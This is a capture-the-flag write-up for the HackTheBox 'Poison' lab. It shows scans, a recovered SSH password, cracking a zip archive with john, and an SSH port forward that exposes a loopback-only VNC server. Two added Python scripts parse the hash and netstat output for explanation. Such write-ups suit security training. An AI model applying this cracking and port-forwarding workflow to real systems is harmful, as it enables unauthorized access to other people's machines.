
HackTheBox-Poison


NMAP

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

┌─[root@htb-yub7jfbxug]─[/home/htb-atsud0]
└──╼ # nmap -p 22,80 -sC -sV poison.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-15 15:52 UTC
Nmap scan report for poison.htb (10.129.1.254)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Port:80


LFI


Port:22

Charix!2#4%6&8(0

Try to use this password to log in over SSH:

# ssh charix@poison.htb
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4

FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

Enumerating the system:

Two things stand out: /home/charix/secret.zip, and a second superuser account, toor.

[+] Superusers
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:

Try to unzip secret.zip:

charix@Poison:~ % unzip secret.zip
Archive: secret.zip
unzip: Passphrase required for this entry

The archive is password-protected, so try to crack it with zip2john and john:

└─$ zip2john secret.zip > poison.zip.hash
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827

┌──(atsud0㉿kali)-[/tmp]
└─$ cat poison.zip.hash
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::secret.zip

┌──(atsud0㉿kali)-[/tmp]
└─$ john poison.zip.hash --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 DONE (2021-04-15 19:17) 0g/s 4426Kp/s 4426Kc/s 4426KC/s !!radzik<3..*7¡Vamos!
Session completed
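The zip2john line above is not an opaque hash: it is John the Ripper's `$pkzip2$` record, and the fields in it are the same values zip2john printed in its summary (cmplen=20, decmplen=8, crc=77537827). The parser below is an added example, not part of the original writeup or of John's code; it splits the record by the field order John documents (count, type, data type, magic type, compressed length, uncompressed length, CRC, two offsets, compression method, data length, two 16-bit check values, hex data) and cross-checks them. The field names `magic_type` and `time_check` are my reading of that documentation, not names John uses. The point worth seeing is that the "hash" embeds the entire ciphertext of the entry (20 bytes = the 12-byte traditional PKZIP encryption header plus the 8-byte stored plaintext), so a zip2john hash file is as sensitive as the archive itself.

```python
import re

# The zip2john output line as shown in the writeup (copied as a constant).
PAGE_HASH_LINE = (
    "secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*"
    "8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::secret.zip"
)

# Field order of John's $pkzip2$ record: C*B*DT*MT*CL*UL*CR*OF*OX*CT*DL*CS*TC*DA.
# "magic_type" and "time_check" are my labels for MT and TC (assumption).
FIELD_NAMES = ["count", "type", "data_type", "magic_type", "cmplen", "decmplen",
               "crc", "offset", "data_offset", "compression", "data_len",
               "crc_check", "time_check", "data"]

ENC_HEADER_LEN = 12  # traditional PKZIP encryption prepends a 12-byte header


def parse_pkzip2(line):
    """Split one zip2john line into a dict; all numeric fields are hex."""
    m = re.search(r"\$pkzip2\$(.*?)\*\$/pkzip2\$", line)
    if not m:
        raise ValueError("not a $pkzip2$ hash line")
    fields = m.group(1).split("*")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} fields, got {len(fields)}")
    rec = dict(zip(FIELD_NAMES, fields))
    for name in FIELD_NAMES[:-1]:
        rec[name] = int(rec[name], 16)
    rec["data"] = bytes.fromhex(rec["data"])   # the encrypted entry itself
    rec["entry"] = line.split(":", 1)[0]       # "archive/member" prefix
    return rec


def sanity_check(rec):
    """Return a list of inconsistencies; an empty list means the record is coherent."""
    problems = []
    if len(rec["data"]) != rec["data_len"]:
        problems.append("embedded data length does not match DL")
    if rec["crc_check"] != rec["crc"] >> 16:
        problems.append("CS is not the high 16 bits of the CRC")
    # compression 0 = stored: ciphertext is header + plaintext, nothing else
    if rec["compression"] == 0 and rec["cmplen"] != ENC_HEADER_LEN + rec["decmplen"]:
        problems.append("stored entry: cmplen should be 12-byte header + plaintext length")
    return problems


def summary(rec):
    """Rebuild the one-line summary zip2john prints from the parsed fields."""
    return (f"ver 2.0 {rec['entry']} PKZIP Encr: cmplen={rec['cmplen']}, "
            f"decmplen={rec['decmplen']}, crc={rec['crc']:X}")


if __name__ == "__main__":
    r = parse_pkzip2(PAGE_HASH_LINE)
    print(summary(r))
    print("plaintext bytes inside:", r["decmplen"], "| problems:", sanity_check(r))
```

Running it reproduces the summary line zip2john printed and confirms the stored entry is only 8 bytes long, which is the size of a TightVNC password file; that detail is what makes the later VNC finding worth a second look.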

Hmm. Let's try the SSH password instead.

unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret

┌──(atsud0㉿kali)-[/tmp]
└─$ cat secret
[|Ֆz!

I don't know what it is.

charix@Poison:~ % netstat -an -p tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 80 10.129.1.254.22 10.10.16.69.54788 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN

Ports 5801 and 5901 look like VNC ports, and both are bound to 127.0.0.1 only.

charix@Poison:~ % ps -auwwx | grep vnc
root 608 0.0 0.8 23620 7652 v0- I 17:28 0:00.16 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 18498 0.0 0.0 412 316 1 R+ 03:40 0:00.00 grep vnc
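Reading the netstat and ps output by eye works for one host; the script below is an added example (not from the writeup) that does the same triage over the netstat lines shown above, which are embedded as a constructed copy. It lists every LISTEN socket, flags whether it is bound to loopback only, and maps VNC's port convention (display N listens on 5900+N for RFB and 5800+N for the built-in HTTP viewer) back to a display number. The defender's takeaway, which the rest of the writeup then demonstrates, is that "bound to localhost" is not an access control: any local account with SSH can forward the port out, so loopback-only services still need real authentication.

```python
# netstat -an -p tcp output as it appears in the writeup (constructed copy of those lines)
NETSTAT_SAMPLE = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 80 10.129.1.254.22 10.10.16.69.54788 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
"""

LOOPBACK = ("127.0.0.1", "::1")


def split_addr(addr):
    """BSD netstat writes host.port; the port is everything after the last dot."""
    host, _, port = addr.rpartition(".")
    return host, int(port)


def listeners(text):
    """Return {port: {'protos', 'binds', 'loopback_only'}} for LISTEN sockets."""
    out = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[-1] != "LISTEN":
            continue                      # skips headers and ESTABLISHED rows
        proto, local = parts[0], parts[3]
        host, port = split_addr(local)
        entry = out.setdefault(port, {"protos": set(), "binds": set()})
        entry["protos"].add(proto)
        entry["binds"].add(host)
    for entry in out.values():
        # "*" means every interface, so it never counts as loopback
        entry["loopback_only"] = all(h in LOOPBACK for h in entry["binds"])
    return out


def classify_vnc(ports):
    """Map listening ports onto VNC display numbers: 5900+N is RFB, 5800+N is HTTP."""
    displays = {}
    for port in ports:
        if 5900 <= port < 6000:
            displays.setdefault(port - 5900, {})["rfb"] = port
        elif 5800 <= port < 5900:
            displays.setdefault(port - 5800, {})["http"] = port
    return displays


def report(text):
    """Human-readable triage lines plus the VNC display map."""
    ls = listeners(text)
    lines = []
    for port in sorted(ls):
        scope = "loopback only" if ls[port]["loopback_only"] else "all interfaces"
        lines.append(f"{port}/tcp: {scope} ({', '.join(sorted(ls[port]['protos']))})")
    return lines, classify_vnc(ls)


if __name__ == "__main__":
    lines, vnc = report(NETSTAT_SAMPLE)
    print("\n".join(lines))
    print("VNC displays:", vnc)
```

On the sample above this reports 25, 5801 and 5901 as loopback-only and resolves the pair 5801/5901 to VNC display :1, which matches the `Xvnc :1 ... -rfbport 5901 -localhost` process in the ps output.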

Using the SSH password failed, so I try secret.

charix@Poison:~ % ssh -NfL 0.0.0.0:1234:localhost:5901 127.0.0.1

vncviewer poison.htb
